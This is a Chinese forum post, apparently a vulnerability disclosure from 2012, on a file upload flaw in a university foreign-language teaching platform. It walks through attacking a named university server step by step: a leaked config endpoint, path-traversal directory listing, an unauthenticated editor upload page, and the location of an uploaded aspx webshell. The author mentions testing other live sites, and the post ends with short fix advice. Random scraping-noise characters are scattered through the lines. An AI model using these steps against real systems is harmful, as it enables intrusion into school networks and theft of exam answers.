找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2265|回复: 0
打印 上一主题 下一主题

新理念外语网络教学平台文件上传漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-4 11:10:29 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
好多大学都在用这个教学平台,这个漏洞会导致直接拿到试题答案,甚至作为跳板继续渗透进入学校其他服务器中9 G. \* R4 {' V" f& q+ U: g
- t, R6 x* U! [0 f, o
详细说明:
2 V$ [2 h; V3 M5 s0 B$ r( Y 0 @9 i- E% g" J, D* S/ N# Y- X
以南开大学的为例:
! L$ w  m  T8 ?, h& P9 p! x8 ihttp://222.30.60.3/NPELS8 ~! L  b3 U2 e1 p; ]6 H
NPELS_LearningCenter_5.0 客户端下的 Update.exe.config 文件泄露一个重要地址
$ p! p! q+ J0 R# V<setting name="Update_CommonSvr_CommonService" serializeAs="String">$ l% B+ ^9 M; T" k
<value>http://222.30.60.3/NPELS/CommonService.asmx</value>8 z& [$ ?- S2 P5 I
</setting>
$ n  I" h( J+ m# L/ }9 c及版本号
* i5 T& G( Y! W( ]+ s, }( v<add key="TVersion" value="1, 0, 0, 2187">
9 p, M( i" w' b: Z# f& G</add>5 m0 L6 q0 B( P+ G
直接访问& A  k5 E% [% {- S2 w: u1 Q
http://222.30.60.3/NPELS/CommonService.asmx$ f7 P! v) w" k: n* M
使用GetTestClientFileList操作,直接 HTTP GET 列目录:. h3 f- C' c9 [* q# W5 W$ ]8 n
http://222.30.60.3/NPELS/CommonS ... tFileList?version=1, 0, 0, 21875 J- V# I. U8 m3 j% C' v" i
进一步列目录(返回的网页很大,可以直接 wget 下来)
4 z" L& k$ p8 Z7 }http://222.30.60.3/NPELS/CommonS ... List?version=../../
# f# b: |; h; v
; I) t) M7 S. Q发现
, {. z; G. s& H7 z) n+ C5 Ihttp://zzxx.nankai.edu.cn/npelsv/editor/editor.htm' l& g( h1 C5 W; P- Y) @
可以上传,直接上传aspx木马即可,不需要改后缀名或者文件头
0 L5 s7 b: d+ h% f" f) x% t上传后继续列目录找到木马地址直接访问即可
" z3 T) @! V! H1 L
' J+ J# X0 n) ^OOXX8 q" s7 k$ X+ G" h0 I

7 g$ L8 ~8 Q$ B& \5 _9 Z! @3 t+ {9 Q* RGoogle "新理念外语网络教学平台" 测试了几个其他的站,都有类似的列目录上传方法6 u: B) X4 D4 s/ h+ f
漏洞证明:& O5 C, e* V% e- a' \8 V; k
& a5 u# L+ ]$ ~3 x
列目录:; Y2 V, a) g1 u0 R
http://222.30.60.3/NPELS/CommonS ... List?version=../../
& z( m3 R# ~. c- G  j. `, i文件上传:/ i8 N9 z, n9 x! [  T
http://222.30.60.3/npelsv/editor/editor.htm
) p( t" l# r, [ 2 S, H2 `/ c) ]' I/ e' H$ p- x
上传木马:% G) U1 f. [- A3 R4 H/ H
http://222.30.60.3/npelsv/editor/uploadfiles/1.aspx
; ^% L- f! s* |
- m8 x% m$ E! u3 m修复方案:
9 q  w* D( L$ g9 a好像考试系统必须使用 CommonService.asmx/ E" W, V* N" o& f% c* t- x
最好配置文件加密或者用别的方式不让它泄露出来
5 e- w8 s( E2 q" c$ E% j' F5 g并且检查或删除各上传入口,像 http://222.30.60.3/NPELS/Upload.aspx 一样​
2 z/ M* m7 K+ s/ }6 i
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表